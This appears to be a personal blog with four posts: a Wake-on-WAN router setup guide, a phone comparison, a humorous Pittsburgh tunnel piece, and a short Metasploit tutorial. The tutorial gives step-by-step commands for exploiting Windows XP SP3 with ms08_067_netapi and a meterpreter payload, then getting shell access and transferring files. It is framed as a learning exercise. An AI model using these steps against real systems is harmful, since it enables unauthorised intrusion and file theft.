Jun 03

Enabling Wake-on-WAN via the Internet

It’s been difficult to gather the required steps to actually enable the ability to WoL (magic packet) via the Internet (also called Wake-on-WAN). This is extremely helpful if you have a remote media server as I do and would like to not have it running 24/7, but be able to access it whenever you would like.

I’ll start with saying that I have the Verizon ActionTec MI424WR FiOS router. Everywhere I looked had different directions, all of which I could never actually follow. So here are the directions, from start to finish, with the MI424WR firmware 40.21.10.3. This is also me documenting my findings so that if I ever need to re-do this, I have step by step…

  1. First, you’ll need to log into your router. Typically this can be done by typing 192.168.1.1 into a web browser. If you’re reading this, I really hope you know that.
    1. Default username is “admin” and the password is “password” Please note that the characters that actually appear in the password field will be obfuscated and not show what you actually type. This is for security, but most users just find it extremely annoying. Ignore what you see and just type. I HIGHLY recommend changing this password as you will be opening a firewall port to the open world.
  2. Port Forwarding:

    1. Once in, click Advanced at the top, and click Yes on the warning.
    2. Click Port Forwarding Rules
    3. Click Add
    4. Enter the following information
      1. Service Name: WoL-Remote
      2. Service Description: Allows Wake On LAN
      3. Add Server Ports:
        1. Protocol: UDP
        2. Source Ports: Any
        3. Destination Ports: Single (default for WoL is 9, but I highly recommend using another port that is not used normally. Typically something above 50000 is ok. The reason is that once you are done, any packet received on this port will be broadcasted to your entire LAN. Use a port that is not widely known or used.)
        4. Click Apply
      4. Click Apply
      5. Notice That WoL-Remote is now in the Port Forwarding Rules List.
  3. Firewall Settings:

    1. Click Firewall Settings and then Yes on the warning.
      1. On the left menu, click Port Forwarding
      2. You’ll see Create new port forwarding rule: Click the down arrow that says “IP Address forward to or select from menu” and select “Specify IP” in that field, type in 192.168.1.254 (this IP must be the highest IP in your network scope. By default, it ends in .254, as stated above.)
      3. Then, set the Application to forward to “WoL-Remote” and click Add
  4. ARP Entry

    1. I’m sure there’s another way to do this part, but next we need to enter an ARP entry into the router’s table. Unfortunately, this ARP entry will NOT survive a router restart, so it will need to be re-entered after every router reboot. I have created a VB/batch script that automatically telnets into the router and creates the entry.The file is attached here: Arp Router Entry. The files must be in the same directory to work. Also, you must change the username/password to match your router’s.
    2. Go back to Advanced along the top of the router’s configuration window, and click Yes on the warning.
    3. Select Local Administration from the left part of the window. (MAKE SURE YOU GO INTO LOCAL AND NOT REMOTE)
      1. Select Using Primary Telnet Port (I’m sure you can use Secure Telnet over SSL, but I never played around with that option. Since I trust everyone on my LAN, I never really cared.) and click Apply.
    4. You will need to have a telnet client installed. Windows 7 has a client built-in, but it’s not installed by default. Directions to configure are located HERE. You can also use PuTTY if you’d like. I prefer the Windows native client since I can make scripts run easier. For the following steps, I’ll use Windows’ native client
    5. Open a command prompt and type in “telnet 192.168.1.1” (without the “quotes” and press enter.
    6. Wait a second and a Username: prompt will appear. Enter your router’s username and press enter. Do the same with your password.
      1. You know you’re right so far when you receive a prompt that shows “Wireless Broadband Router>”
    7. Type “system shell” (again without “quotes”) and press enter.
    8. From here, enter “arp -s 192.168.1.254 FF:FF:FF:FF:FF:FF” (no “quotes”) and press enter
    9. You know you are correct when you type “arp” (no quotes) and press enter, and you see 192.168.1.254 with the MAC of all FF’s next to it. You can then close the window.
  5. Testing/using WoL

    1. I use an Android app called WakeOnLan, which can be found HERE. This app is pretty cool because it can also create a widget so that you can wake your computer up by one touch.
    2. For this to actually work, you need your external IP address, which can be found HERE.
    3. Configure the app using the information requested.
      1. Note that when you enter the IP address, type in your external IP address found above. The port will be the port you entered above.
    4. Once you’re done, shut down your computer and test it out!

 

Jul 07

iPhone 3Gs vs. HTC One X (AT&T) vs. Samsung Galaxy S3 (AT&T) Experience

This is a comparison of the three, not by specs, but by my experience while using each device.

iPhone 3Gs

I had the iPhone 3Gs for two and a half years. I had jailbroke the device about two hours after I walked out of the AT&T store. I loved that phone. It did everything I needed to do at the time, but I hated the idea of being controlled by Apple (hence the jailbreaking.) After jailbreaking it, I tweaked some settings so that I could have a 5×5 grid rather than the 4×4 (iconoclasm), changed the icon themes (Winterboard), notification tweaks (BiteSMS), backgrounding capabilities (backgrounder) which was later released in iOS 4, and have toggles for Wifi and GPS (sbsettings). Once I had everything set up, the only thing that bothered me about it was things didn’t work perfectly with the tweaks, which was expected since they are tweaks, and that Apple didn’t seem to be listening to their customers about what they wanted. We wanted toggles for Wifi, GPS, Bluetooth, texts to pop-up and be able to reply without leaving an app, and just have the ability to customize things more. I would constantly update my iOS once a stable un-tethered jailbreak was released, rejailbreak and then set it up again. Did I mention that I don’t like my personal devices to be controlled and locked down?

My contract with AT&T was up in January 2012, but I decided that I would wait for the iPhone 5, which was rumored to be released sometime in June at that time. By this time, my phone was running so slow, that I would have to tap to open my Messages app and wait about 5 seconds, then tap the thread and wait again. That was driving me crazy, but not enough to unjailbreak and return to stock. My girlfriend and friends kept saying I needed to get a new phone, but I was determined to wait. Beside the fact of being restricted, I liked the iPhone. I really like other Apple products (I am actually typing this on the Mid-2010 MacBook Pro.) Now let me put this out there now. I am NOT an “Apple Head” or an extreme “Apple-Fanboy.” I will say that Apple has it’s downfalls, mostly the price, but I do prefer Apple products over others. I just feel that their operating systems are more stable and secure. Once again, I am NOT claiming Apple products are flawless. They just don’t catch anything nearly as easily as Microsoft and Andriod.

Now, to the comparisons I have experienced. First though, I understand that the iPhone 3Gs is well over two years old. I will be doing the best comparison I can thinking back to how I felt about the 3Gs when I first walked out of the store, unless I state otherwise.

I really liked how easily the iPhone was to get used to. Everything seems self explanatory. Everything that could to be changed was in the “Settings” app. I didn’t have to look all over the place to change one setting. The initial setup was a breeze. I did not have my Mac at the time, so I used my Windows 7 Ultimate machine that I built to set it up. No big deal. I did not like the idea of having so many Apple Daemons running though, such as “Apple Mobile Device Service” and “iTunes Helper.” Even though I do not believe they left that big of a footprint in my computer, I still wanted to keep my machine as lean as possible. I believe I tried to kill the services, but iTunes yelled at me and I didn’t feel like dealing with it, so I turned them back on.

HTC One X

Photo from: http://www.techradar.com/

I only had the HTC One X for about three weeks, so I didn’t get much time to play with it and learn everything that it offers. At first glance, the phone is beautiful, sleek, and very appealing to the eye. The Super IPS screen is huge (4.7in), bright, and shows every detail. The phone was easy to hold. The matte finish made it easy to hold, even with sweaty hands. The immediate falt was the fact that there was no SD card slot, and the battery is not removable. Both were things I was used to because with the iPhone, I was locked in my 16GB internal and no removable battery. The phone sports a 1.5GHz dual-core Qualcomm Snapdragon S4 processor, 1GB of RAM, a 1800 mAh battery. I really liked the UI (Sense 4.0) and how responsive it was… at first. When I first bought it, it was amazingly fast (maybe due to the fact of how slow my iPhone was.) I then rooted the device (remember? I hate to have my personal devices controlled and locked) and started to use some apps such as avast! Free Mobile Security for my anti-virus and Cosmos for battery control (Friends recommended those apps.) I then played around looking more into settings and other features of the phone and came across the task manager. This is where it started to turn south for me. The phone is spec’d out to have 1GB of RAM. The task manager only showed approx 768MB of RAM, 400MB of that was being used from the second I turned the device on after uninstalling avast! and Cosmos. I read that Sense 4.0 is a huge memory hog, but that is because it wraps everything within Andriod OS into one. That upset me a little bit, but nothing that I wasn’t used to. I just figured with a whole new OS, things would be completely different. Texting on this phone was so easy. If the phone didn’t know a word, I could tap add to dictionary, and edit it any time you want in Settings> Language & Keyboard> HTC Sense Input> Personal Dictionary (something I hated about the iPhone). The HTC One X comes with Beats Audio built into the phone when headphones are used. I never did get a chance to use this feature, but I wish I would have (I’m a very busy college student.) The screen seemed to be extremely responsive when the phone wasn’t being bogged down by who-knows-what. Sometimes I would actually have to hold the power button to get the phone to shut off just so I could unlock it. Another down side to the One X was the battery life. I used the “Automatically Adjust Brightness” setting, and I had to charge the phone about half way through the day. I would have the phone off the charger at 5am, it would sit on standby (GPS, Bluetooth, and Wifi off) until about 10am. Then very light use from 11:30am-4:30pm (I was in class.) By about 6pm, I was at about 30%. I know that the screen was the biggest draw of battery power, but that is crazy that it used so much battery in such a short amount of time. If HTC could solve the hanging issues, SD card, and the battery, that phone would be perfect.

Samsung Galazy S3

The Samsung Galaxy S3 (or SIII) at first glance looks to me like Samsung didn’t do much designing. The overall design of the phone looks slightly dated to me, and was hard to hold, even with relatively dry hands because of the glossy back. The phone is very thin, as is the One X, but the S3 has a few edges up on the One X, such as RAM, SD card slot, and removable battery. This phone also has the 1.5GHz duel-core Qualcomm Snapdragon S4 processor, but has 2GB of RAM, 2100 mAh battery that can be replaced, and a slightly larger 4.8in screen. The Screen does not seem to get as bright as the One X, which is actually fine by me. I can use this phone in the same scenario as the One X and use it until 10:15pm and still have about 30% rather than the One X being at 30% by about 4pm. The TouchWiz UI seems to be pretty lightweight and is pretty cool to work with. With no apps running, just weather widget and an animated walpaper, using about 515MB of RAM. Now remember, this phone has 2GB.The nature theme is getting annoying to me because of the water sounds and will be removed shortly (I have root access.) The phone has a few motion controls that I find really cool. Two that I use are it can call a contact that you are currently looking at or texting just by putting the phone up to your ear (while working on my phone at night, I tend to put the phone on my chest while I’m waiting. I have managed to call my girlfriend about 3 times, and my uncle once because I was editing his contact information. I have since then disabled this feature) and mute incoming calls and pause playing sounds when the screen is on by turning the device glass down on a table. I have the same apps installed on my S3, avast! and Cosmos, and have yet to have my phone hang on me. I also really like the fact that TouchWiz has toggles on the notification pulldown bar for Wifi, Bluetooth, GPS, Sound, Screen rotation lock, Mobile data, Power Saving, Airplane mode, and Sync. Texting on the S3 does not seem to be as easy. It may just be taking a while for the phone to learn how I type, but it seems to make a lot of mistakes using the predictive text. Editing the user dictionary is also buried under Settings>Language and Input> Samsung Keyboard Settings> Predictive Text (tap the name, not the toggle) > My Word List.

This is Andriod in general. The Andriod platform is a little harder to get used to than iOS. With the iOS, I learned where most things were in the first few days, where as in Andriod, I am still (a month later) learning my way around. I already expected myself to be searching for the most simple things anyway. I really like the way Andriod uses the Google Play. For free stuff, you don’t have to put in a password. I haven’t bought anything yet so I’m not sure what happens when you do. That was one thing that I did not like about the Apple App Store. One thing I did like though, was that Apple controls the apps posted. So this means that apps in the App Store should be safe. There were a few times that they slipped up, but for the most part, they do a good job. Google Play does review their submissions, but they are not as strict. Whenever a user is about to download and install an application, at the bottom of the conformation page, there is a list of what permissions that the app will be granted, such as reading SMS, SD card access. An educated user can look at these permissions and may notice if something is not right.

 

Overall, I believe I have learned to prefer Andriod OS over iOS because of the customization and features. As of the writing, I prefer the Samsung Galaxy S3 because of the battery life, processing power, ability to customize more, and I also know about the brand better than HTC. I believe it is personal opinion on which device you choose, but these are my thoughts on each device.

Mar 13

Hacking XP SP3 with BackTrack Using Metasploit

Shell access hacking in metasploit XP SP3
Enter msconsole.
Use windows/smb/ms08_067_netapi <enter>
show exploits shows what exploits can be used.
set payload windows/meterpreter/bind_tcp <enter>
This will allow you to use meterpreter to connect to the shell of the XP box
Show options <enter>
set RPORT 445 (Optional, but recommended) <enter>
set RHOST (remote host) *the machine you are attacking’s IP address* <enter>
set LHOST (local host) *your backtrack machine’s IP address* <enter>
exploit <enter>
This will give you access into the XP box
if you want shell access, type in shell.
NOTE: when you type in shell, you will need to use DOS commands! dir- will display folder contents (ls)

To transfer files, you MUST NOT be in meterpreter. If you are in the Windows shell, type “exit” to get out
Syntax:
download c:\\FILE\PATH\TO\FILE /LOCATION/TO/SAVE/ON/BackTrack
upload /FILE/ON/BackTrack c:\\LOCATION\TO\COPY
For a video, see http://www.youtube.com/watch?v=fj4ckhacLrE except use “set payload windows/meterpreter/bing_tcp <enter>” for whatever they use for the payload. I’ll possibly post a video later.

More Info:
http://www.offensive-security.com/metasploit-unleashed/Metasploit_Meterpreter_Basics

Mar 13

Tunnel Monster

Well, we all know that Pittsburgh has horrible drivers. The tunnels in and out of Pittsburgh make things even worse.
Many people wonder why traffic is always backed up going into the tunnels especially the Squirrel Hill, the Fort Pitt, and The Liberty, “Tubes as us Pittsburghez call them”, but when they finally get out, traffic is clear as day. Scientists believe it’s because of algorithms, vehicles hitting their brakes and not maintaining speed. I believe they are correct, partially. Many have heard of the tunnel “monsters”. If you haven’t, here is the original that some people have seen online. (If you know the original creator, please let me know so they can receive credit. It’s a very nice image.)

Original Tunnel Monster

Original Tunnel Monster

My cousin, who I believe is my second cousin (I’m not good with family trees), posted on his website talking about the tunnel monster and how we should search for it, and get help from the pros. This is a great idea! I know I am tired of waiting in endless traffic for hours, killing my gas tank, truck, and wallet just to emerge from the tunnels to see nothing but a clear road. I’d understand the traffic if there was construction going on in or on the other side of the tunnels (which there will be shortly until the summer of 2014…), but there is NOTHING going on. Just people being afraid to actually GO into the tunnels. He posted on a comment I made about the tunnel monster saying, “I expect your version of the tunnel monster, BTW.” So, below in the second image is my version.

My sighting of the Tunnel Monster

Disclamer (I do not want sued!): I have nothing against Lady Gaga, I simply was searching for “Monster” on google, and found the image of her and though her pose was perfect for my image.